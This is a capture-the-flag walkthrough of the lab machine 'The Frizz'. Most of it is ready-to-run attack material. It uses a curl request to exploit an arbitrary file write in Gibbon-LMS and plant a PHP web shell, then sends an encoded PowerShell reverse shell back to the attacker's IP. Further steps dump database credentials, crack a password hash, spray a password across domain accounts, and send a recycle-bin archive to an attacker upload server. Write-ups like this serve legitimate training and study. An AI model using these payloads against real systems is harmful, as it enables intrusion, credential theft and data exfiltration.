The Frizz
by 0xW1LD
Information Gathering
Enumeration
Let’s first start off with an nmap scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-16 03:49:02Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
51001/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51010/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51037/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-03-16T03:50:00
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 36038/tcp): CLEAN (Timeout)
| Check 2 (port 51039/tcp): CLEAN (Timeout)
| Check 3 (port 35435/udp): CLEAN (Timeout)
| Check 4 (port 50651/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m58s
HTTP
Attempting to open the Apache webpage redirects us to frizzdc.frizz.htb which, after adding this to our hosts file we get:
On clicking Staff Login we get redirected to a Gibbon-LMS login
Foothold
Looking around we can find an Arbitrary File Write vulnerability:
We can abuse this with the following command:
1
2
3
curl 'http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php' -d 'img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8%2b&path=asdf.php&gibbonPersonID=0000000001'
asdf.php
Visiting http://frizzdc.frizz.htb/Gibbon-LMS/asdf.php?cmd=whoami gets us a response of:
1
frizz\w.webservice frizz\w.webservice
We successfully have RCE! Let’s modify this to get a reverse shell:
- create a
phppayload using the encoded revshell:
1
2
3
echo '<?php echo system("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA1ADgAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA")?>' | base64 -w 0; echo
PD9waHAgZWNobyBzeXN0ZW0oInBvd2Vyc2hlbGwgLWUgSkFCakFHd0FhUUJsQUc0QWRBQWdBRDBBSUFCT0FHVUFkd0F0QUU4QVlnQnFBR1VBWXdCMEFDQUFVd0I1QUhNQWRBQmxBRzBBTGdCT0FHVUFkQUF1QUZNQWJ3QmpBR3NBWlFCMEFITUFMZ0JVQUVNQVVBQkRBR3dBYVFCbEFHNEFkQUFvQUNJQU1RQXdBQzRBTVFBd0FDNEFNUUEwQUM0QU1RQTFBRGdBSWdBc0FEUUFOQUEwQURRQUtRQTdBQ1FBY3dCMEFISUFaUUJoQUcwQUlBQTlBQ0FBSkFCakFHd0FhUUJsQUc0QWRBQXVBRWNBWlFCMEFGTUFkQUJ5QUdVQVlRQnRBQ2dBS1FBN0FGc0FZZ0I1QUhRQVpRQmJBRjBBWFFBa0FHSUFlUUIwQUdVQWN3QWdBRDBBSUFBd0FDNEFMZ0EyQURVQU5RQXpBRFVBZkFBbEFIc0FNQUI5QURzQWR3Qm9BR2tBYkFCbEFDZ0FLQUFrQUdrQUlBQTlBQ0FBSkFCekFIUUFjZ0JsQUdFQWJRQXVBRklBWlFCaEFHUUFLQUFrQUdJQWVRQjBBR1VBY3dBc0FDQUFNQUFzQUNBQUpBQmlBSGtBZEFCbEFITUFMZ0JNQUdVQWJnQm5BSFFBYUFBcEFDa0FJQUF0QUc0QVpRQWdBREFBS1FCN0FEc0FKQUJrQUdFQWRBQmhBQ0FBUFFBZ0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUMwQVZBQjVBSEFBWlFCT0FHRUFiUUJsQUNBQVV3QjVBSE1BZEFCbEFHMEFMZ0JVQUdVQWVBQjBBQzRBUVFCVEFFTUFTUUJKQUVVQWJnQmpBRzhBWkFCcEFHNEFad0FwQUM0QVJ3QmxBSFFBVXdCMEFISUFhUUJ1QUdjQUtBQWtBR0lBZVFCMEFHVUFjd0FzQURBQUxBQWdBQ1FBYVFBcEFEc0FKQUJ6QUdVQWJnQmtBR0lBWVFCakFHc0FJQUE5QUNBQUtBQnBBR1VBZUFBZ0FDUUFaQUJoQUhRQVlRQWdBRElBUGdBbUFERUFJQUI4QUNBQVR3QjFBSFFBTFFCVEFIUUFjZ0JwQUc0QVp3QWdBQ2tBT3dBa0FITUFaUUJ1QUdRQVlnQmhBR01BYXdBeUFDQUFQUUFnQUNRQWN3QmxBRzRBWkFCaUFHRUFZd0JyQUNBQUt3QWdBQ0lBVUFCVEFDQUFJZ0FnQUNzQUlBQW9BSEFBZHdCa0FDa0FMZ0JRQUdFQWRBQm9BQ0FBS3dBZ0FDSUFQZ0FnQUNJQU93QWtBSE1BWlFCdUFHUUFZZ0I1QUhRQVpRQWdBRDBBSUFBb0FGc0FkQUJsQUhnQWRBQXVBR1VBYmdCakFHOEFaQUJwQUc0QVp3QmRBRG9BT2dCQkFGTUFRd0JKQUVrQUtRQXVBRWNBWlFCMEFFSUFlUUIwQUdVQWN3QW9BQ1FBY3dCbEFHNEFaQUJpQUdFQVl3QnJBRElBS1FBN0FDUUFjd0IwQUhJQVpRQmhBRzBBTGdCWEFISUFhUUIwQUdVQUtBQWtBSE1BWlFCdUFHUUFZZ0I1QUhRQVpRQXNBREFBTEFBa0FITUFaUUJ1QUdRQVlnQjVBSFFBWlFBdUFFd0FaUUJ1QUdjQWRBQm9BQ2tBT3dBa0FITUFkQUJ5QUdVQVlRQnRBQzRBUmdCc0FIVUFjd0JvQUNnQUtRQjlBRHNBSkFCakFHd0FhUUJsQUc0QWRBQXVBRU1BYkFCdkFITUFaUUFvQUNrQSIpPz4K
- Start a listener
1
2
3
4
nc -lvnp 4444
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
- upload the Revshell using the Arbitrary File Write
1
curl 'http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php' -d 'img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oInBvd2Vyc2hlbGwgLWUgSkFCakFHd0FhUUJsQUc0QWRBQWdBRDBBSUFCT0FHVUFkd0F0QUU4QVlnQnFBR1VBWXdCMEFDQUFVd0I1QUhNQWRBQmxBRzBBTGdCT0FHVUFkQUF1QUZNQWJ3QmpBR3NBWlFCMEFITUFMZ0JVQUVNQVVBQkRBR3dBYVFCbEFHNEFkQUFvQUNJQU1RQXdBQzRBTVFBd0FDNEFNUUEwQUM0QU1RQTFBRGdBSWdBc0FEUUFOQUEwQURRQUtRQTdBQ1FBY3dCMEFISUFaUUJoQUcwQUlBQTlBQ0FBSkFCakFHd0FhUUJsQUc0QWRBQXVBRWNBWlFCMEFGTUFkQUJ5QUdVQVlRQnRBQ2dBS1FBN0FGc0FZZ0I1QUhRQVpRQmJBRjBBWFFBa0FHSUFlUUIwQUdVQWN3QWdBRDBBSUFBd0FDNEFMZ0EyQURVQU5RQXpBRFVBZkFBbEFIc0FNQUI5QURzQWR3Qm9BR2tBYkFCbEFDZ0FLQUFrQUdrQUlBQTlBQ0FBSkFCekFIUUFjZ0JsQUdFQWJRQXVBRklBWlFCaEFHUUFLQUFrQUdJQWVRQjBBR1VBY3dBc0FDQUFNQUFzQUNBQUpBQmlBSGtBZEFCbEFITUFMZ0JNQUdVQWJnQm5BSFFBYUFBcEFDa0FJQUF0QUc0QVpRQWdBREFBS1FCN0FEc0FKQUJrQUdFQWRBQmhBQ0FBUFFBZ0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUMwQVZBQjVBSEFBWlFCT0FHRUFiUUJsQUNBQVV3QjVBSE1BZEFCbEFHMEFMZ0JVQUdVQWVBQjBBQzRBUVFCVEFFTUFTUUJKQUVVQWJnQmpBRzhBWkFCcEFHNEFad0FwQUM0QVJ3QmxBSFFBVXdCMEFISUFhUUJ1QUdjQUtBQWtBR0lBZVFCMEFHVUFjd0FzQURBQUxBQWdBQ1FBYVFBcEFEc0FKQUJ6QUdVQWJnQmtBR0lBWVFCakFHc0FJQUE5QUNBQUtBQnBBR1VBZUFBZ0FDUUFaQUJoQUhRQVlRQWdBRElBUGdBbUFERUFJQUI4QUNBQVR3QjFBSFFBTFFCVEFIUUFjZ0JwQUc0QVp3QWdBQ2tBT3dBa0FITUFaUUJ1QUdRQVlnQmhBR01BYXdBeUFDQUFQUUFnQUNRQWN3QmxBRzRBWkFCaUFHRUFZd0JyQUNBQUt3QWdBQ0lBVUFCVEFDQUFJZ0FnQUNzQUlBQW9BSEFBZHdCa0FDa0FMZ0JRQUdFQWRBQm9BQ0FBS3dBZ0FDSUFQZ0FnQUNJQU93QWtBSE1BWlFCdUFHUUFZZ0I1QUhRQVpRQWdBRDBBSUFBb0FGc0FkQUJsQUhnQWRBQXVBR1VBYmdCakFHOEFaQUJwQUc0QVp3QmRBRG9BT2dCQkFGTUFRd0JKQUVrQUtRQXVBRWNBWlFCMEFFSUFlUUIwQUdVQWN3QW9BQ1FBY3dCbEFHNEFaQUJpQUdFQVl3QnJBRElBS1FBN0FDUUFjd0IwQUhJQVpRQmhBRzBBTGdCWEFISUFhUUIwQUdVQUtBQWtBSE1BWlFCdUFHUUFZZ0I1QUhRQVpRQXNBREFBTEFBa0FITUFaUUJ1QUdRQVlnQjVBSFFBWlFBdUFFd0FaUUJ1QUdjQWRBQm9BQ2tBT3dBa0FITUFkQUJ5QUdVQVlRQnRBQzRBUmdCc0FIVUFjd0JvQUNnQUtRQjlBRHNBSkFCakFHd0FhUUJsQUc0QWRBQXVBRU1BYkFCdkFITUFaUUFvQUNrQSIpPz4K%2b&path=w1ld.php&gibbonPersonID=0000000001' && curl 'http://frizzdc.frizz.htb/Gibbon-LMS/w1ld.php' -I
We get a call-back on our listener:
1
2
3
Ncat: Connection from 10.129.225.39:49759.
whoami
frizz\w.webservice
Looking around we find database credentials:
1
2
3
4
5
6
7
8
PS C:\xampp\htdocs\Gibbon-LMS> cat config.php
<SNIP>
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
<SNIP>
xampp usually has MySQL installed in /xampp/mysql/bin
1
2
3
4
5
6
7
8
9
PS C:\xampp\mysql\bin> ls mysql.exe
Directory: C:\xampp\mysql\bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/30/2023 5:58 AM 3784616 mysql.exe
We can enumerate the database using the binary in this folder.
1
2
3
4
5
PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 -D gibbon -e "show databases;"
Database
gibbon
information_schema
test
Let’s look for the tables.
1
2
3
4
5
6
7
8
9
PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 -D gibbon -e "use gibbon; show tables;"
<SNIP>
gibbonpayment
gibbonpermission
gibbonperson
gibbonpersonaldocument
gibbonpersonaldocumenttype
gibbonpersonmedical
<SNIP>
In the output we find gibbonperson let’s take a look.
1
2
3
PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 -D gibbon -e "USE gibbon; select * FROM gibbonperson;"
gibbonPersonID title surname firstName preferredName officialName nameInCharacters gender username passwordStrong passwordStrongSalt passwordForceReset status canLogin gibbonRoleIDPrimary gibbonRoleIDAll dob email emailAlternate image_240 lastIPAddress lastTimestamp lastFailIPAddress lastFailTimestamp failCount address1 address1District address1Country address2 address2District address2Country phone1Type phone1CountryCode phone1 phone3Type phone3CountryCode phone3 phone2Type phone2CountryCode phone2 phone4Type phone4CountryCode phone4 website languageFirst languageSecond languageThird countryOfBirth birthCertificateScan ethnicity religion profession employer jobTitle emergency1Name emergency1Number1 emergency1Number2 emergency1Relationship emergency2Name emergency2Number1 emergency2Number2 emergency2Relationship gibbonHouseID studentID dateStart dateEnd gibbonSchoolYearIDClassOf lastSchool nextSchool departureReason transport transportNotes calendarFeedPersonal viewCalendarSchool viewCalendarPersonal viewCalendarSpaceBooking gibbonApplicationFormID lockerNumber vehicleRegistration personalBackground messengerLastRead privacy dayType gibbonThemeIDPersonal gibboni18nIDPersonal studentAgreements googleAPIRefreshToken microsoftAPIRefreshToken genericAPIRefreshToken receiveNotificationEmails mfaSecret mfaToken cookieConsent fields
0000000001 Ms. Frizzle Fiona Fiona Fiona Frizzle Unspecified f.frizzle 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 /aACFhikmNopqrRTVz2489 N Full Y 001 001 NULL f.frizzle@frizz.htb NULL NULL ::1 2024-10-29 09:28:59 NULL NULL 0 NULL NULL NULL NULL Y Y N NULL NULL NULL NULL NULL NULL NULL YNULL NULL NULL
We find a hashed password and password salt!
Let’s put this into a text file:
1
2
echo "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
" > hash.txt
And crack it using hashcat:
1
2
3
4
5
6
7
8
9
10
11
hashcat -m 1420 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 7 5800H with Radeon Graphics, 2913/5890 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
We get crack the hash! we get the following credentials:
f.frizzle:Jenni_Luvs_Magic23
User
Let’s grab users using ldap and kerberos authentication:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
sudo ntpdate frizzdc.frizz.htb && nxc ldap frizzdc.frizz.htb -u "f.frizzle" -p "Jenni_Luvs_Magic23" -k --users
[sudo] password for kali:
2025-03-16 17:10:56.162014 (+1100) +0.766024 +/- 0.299041 frizzdc.frizz.htb 10.129.225.39 s1 no-leap
CLOCK: time stepped by 0.766024
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb [*] x64 (name:frizzdc.frizz.htb) (domain:frizz.htb) (signing:True) (SMBv1:False)
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb [*] Enumerated 21 domain users: frizz.htb
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb -Username- -Last PW Set- -BadPW- -Description-
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb Administrator 2025-02-25 21:24:10 0 Built-in account for administering the computer/domain
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb krbtgt 2024-10-29 14:19:54 0 Key Distribution Center Service Account
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb f.frizzle 2024-10-29 14:27:03 0 Wizard in Training
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb w.li 2024-10-29 14:27:03 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb h.arm 2024-10-29 14:27:03 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb M.SchoolBus 2024-10-29 14:27:03 0 Desktop Administrator
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb d.hudson 2024-10-29 14:27:03 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb k.franklin 2024-10-29 14:27:03 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb l.awesome 2024-10-29 14:27:03 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb t.wright 2024-10-29 14:27:03 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb r.tennelli 2024-10-29 14:27:04 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb J.perlstein 2024-10-29 14:27:04 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb a.perlstein 2024-10-29 14:27:04 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb p.terese 2024-10-29 14:27:04 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb v.frizzle 2024-10-29 14:27:04 0 The Wizard
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb g.frizzle 2024-10-29 14:27:04 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb c.sandiego 2024-10-29 14:27:04 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb c.ramon 2024-10-29 14:27:04 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb m.ramon 2024-10-29 14:27:04 0 Student
LDAP frizzdc.frizz.htb 389 frizzdc.frizz.htb w.Webservice 2024-10-29 14:27:04 0 Service for the website
Let’s grab a Kerberos ticket using impacket-getTGT
1
2
3
impacket-getTGT frizz.htb/f.frizzle:Jenni_Luvs_Magic23
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in f.frizzle.ccache
Then let’s add the Kerberos realm:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
echo "[libdefaults]
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
" | sudo tee /etc/krb5.conf
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_kdc = true
rdns = false
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
Let’s use ssh to now connect to the dc using Kerberos:
1
2
3
4
KRB5CCNAME=f.frizzle.ccache ssh f.frizzle@frizzdc.frizz.htb
PowerShell 7.4.5
PS C:\Users\f.frizzle>
Privilege Escalation
First off let’s login to http://frizzdc.frizz.htb/Gibbon-LMS using f.frizzle’s credentials:
We have quite a few messages so let’s check them, looking at it we notice that certain files have been DELETED:
Let’s take a look at our recycling bin:
1
2
3
4
5
6
7
PS C:\Users\f.frizzle> ls -hidden 'C:\$RECYCLE.BIN'
Directory: C:\$RECYCLE.BIN
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs 10/29/2024 7:31 AM S-1-5-21-2386970044-1145388522-2932701813-1103
Looking in this folder we find a couple of zip archives:
1
2
3
4
5
6
7
8
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> ls
Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
Let’s use an upload server to download these files.
First Let’s grab PSUPload.ps1
1
2
3
4
5
6
7
8
9
10
11
12
wget https://raw.githubusercontent.com/juliourena/plaintext/refs/heads/master/Powershell/PSUpload.ps1
--2025-03-18 21:52:16-- https://raw.githubusercontent.com/juliourena/plaintext/refs/heads/master/Powershell/PSUpload.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1752 (1.7K) [text/plain]
Saving to: ‘PSUpload.ps1’
PSUpload.ps1 100%[======================================================================================================>] 1.71K --.-KB/s in 0s
2025-03-18 21:52:17 (7.48 MB/s) - ‘PSUpload.ps1’ saved [1752/1752]
Let’s run the script by copy pasting it into our target:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103>
function Invoke-FileUpload {
Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]$File,
[Parameter(Position = 1, Mandatory = $True)]
[String]$Uri
)
$FileToUpload = Get-ChildItem -File "$File"
$UTF8woBOM = New-Object "System.Text.UTF8Encoding" -ArgumentList @($false)
$boundary = '----BCA246E0-E2CF-48ED-AACE-58B35D68B513'
$tempFile = New-TemporaryFile
Remove-Item $tempFile -Force -ErrorAction Ignore
$sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM)
$fileName = [System.IO.Path]::GetFileName($FileToUpload.FullName)
$sw.Write("--$boundary`r`nContent-Disposition: form-data;name=`"files`";filename=`"$fileName`"`r`n`r`n")
$sw.Close()
$fs = New-Object System.IO.FileStream($tempFile, [System.IO.FileMode]::Append)
$bw = New-Object System.IO.BinaryWriter($fs)
$fileBinary = [System.IO.File]::ReadAllBytes($FileToUpload.FullName)
$bw.Write($fileBinary)
$bw.Close()
$sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM)
$sw.Write("`r`n--$boundary--`r`n")
$sw.Close()
Invoke-RestMethod -Method POST -Uri $uri -ContentType "multipart/form-data; boundary=$boundary" -InFile $tempFile
$FileHash = Get-FileHash -Path "$File" -Algorith MD5
Write-Host "[+] File Uploaded: " $FileToUpload.FullName
Write-Host "[+] FileHash: " $FileHash.Hash
}
Then download and install python upload server:
1
2
3
pip install uploadserver --break-system-packages
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: uploadserver in /home/kali/.local/lib/python3.13/site-packages (6.0.0)
Next let’s start our upload server:
1
2
3
python3 -m uploadserver
File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Lastly let’s upload our file:
1
2
3
4
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> Invoke-FileUpload -File '$RE2XMEG.7z' -Uri 'http://10.10.14.6:8000/upload'
[+] File Uploaded: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z
[+] FileHash: 41925935E2002D33F7203F5F76F5D5BE
We have successfully exfiltrated a file from the $RECYCLE.BIN! Let’s unzip our file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
7za x '$RE2XMEG.7z'
7-Zip (a) 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 30416987 bytes (30 MiB)
Extracting archive: $RE2XMEG.7z
--
Path = $RE2XMEG.7z
Type = 7z
Physical Size = 30416987
Headers Size = 65880
Method = ARM64 LZMA2:26 LZMA:20 BCJ2
Solid = +
Blocks = 3
Everything is Ok
Folders: 684
Files: 5384
Size: 141187501
Compressed: 30416987
Let’s cd into the directory that was just made:
1
cd wapt
And let’s look for passwords:
1
2
3
4
5
grep -r 'password'
<SNIP>
conf/waptserver.ini:wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
<SNIP.
We found what looks to be a base64 hash! Let’s decode it!
1
2
echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d
!suBcig@MehTed!R
Let’s do a simple password spray using the users we have extracted earlier:
1
2
3
4
nxc smb frizzdc.frizz.htb -u users.txt -p '!suBcig@MehTed!R' -k
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Administrator:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Guest:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\krbtgt:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\f.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\w.li:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\h.arm:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
Success! We found the following credentials:
M.SchoolBus: !suBcig@MehTed!R
Let’s grab a TGT really quickly:
1
2
3
4
5
impacket-getTGT 'frizz.htb/M.SchoolBus:!suBcig@MehTed!R'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in M.SchoolBus.ccache
We can login to M.SchoolBus!
1
2
3
KRB5CCNAME=M.SchoolBus.ccache ssh -K M.SchoolBus@frizzdc.frizz.htb
PowerShell 7.4.5
PS C:\Users\M.SchoolBus>
Let’s collect some bloodhound data:
1
nxc ldap frizzdc.frizz.htb -u M.SchoolBus -p !suBcig@MehTed!R' --bloodhound -c all
Looking at the data we can see that M.SchoolBus can write GP-Links
Additionally we can see that he’s a member of Desktop Admins
In which he’s a transitive member of Group Policy Creator Owners
So let’s download a copy of SharpGPOAbuse.exe
